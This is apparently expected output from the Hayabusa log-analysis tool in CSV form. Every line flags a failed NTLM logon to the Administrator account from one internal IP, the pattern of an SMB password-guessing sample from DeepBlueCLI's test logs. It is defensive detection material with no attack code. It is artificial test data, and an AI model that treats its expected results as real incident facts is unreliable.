+2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
